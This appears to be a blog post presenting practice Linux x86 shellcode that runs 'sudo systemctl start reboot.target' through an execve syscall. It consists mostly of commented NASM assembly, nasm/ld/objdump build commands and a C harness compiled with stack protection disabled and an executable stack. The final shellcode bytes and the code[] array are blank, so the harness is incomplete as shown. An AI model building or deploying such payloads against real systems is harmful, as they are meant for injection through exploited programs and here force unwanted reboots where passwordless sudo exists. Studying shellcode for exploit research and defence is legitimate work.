shellcode 1 : Linux/x86 – sudo systemctl start

I recently started working on writing 32 bit  shellcodes for linux  . And I will be posting sample shellcodes i created for practicing over here in this blog. This is one of many shellcodes that i have written. This shell code utilizes systemd init system to reboot a system . lets jump in . you need to know how syscalls are called and a basic assembly-fu to understand this piece of code. code is self explanatory with comments.



section .text

; clear out registers before use
xor eax, eax
xor edx,edx

; PUSH /usr////bin/sudo
push eax
push 0x6f647573
push 0x2f6e6962
push 0x2f2f2f2f
push 0x7273752f

; execve first argument
mov ebx, esp

; PUSH /bin///systemctl
push eax
push 0x6c74636d
push 0x65747379
push 0x732f2f2f
push 0x6e69622f
mov ecx,esp

push eax
push byte 0x74
push 0x65677261
push 0x742e746f
push 0x6f626572
mov esi,esp

; PUSH start
push eax
push byte 0x74
push 0x72617473
mov edi,esp

; execve second argument
push eax
push esi
push edi
push ecx
push ebx
mov ecx,esp

; execve third argument
push eax
mov edx, esp

; mov 11 to eax (syscall for execve)
mov al, 11
; Call the interupt
int 0x80

assembling : nasm   -f   elf32  -o  systmctl_reboot.o  systmctl_reboot.nasm

linking : ld -z execstack -o systmctl_reboot   systmctl_reboot.o

finally we can get the final machine code with the help of objdump,

objdump -d ./systmctl_reboot  -M intel

final shellcode :


this can be used inside our template c program to trigger this shellcode.


unsigned char code[] = \


printf(“Shellcode Length: %d\n”, strlen(code));

int (*ret)() = (int(*)())code;



compile with no stack protection and exec stack flags.

gcc -fno-stack-protector -z execstack -o shellcode shellcode.c


This should trigger a system restart if nopasswd has been set to execute sudo commands.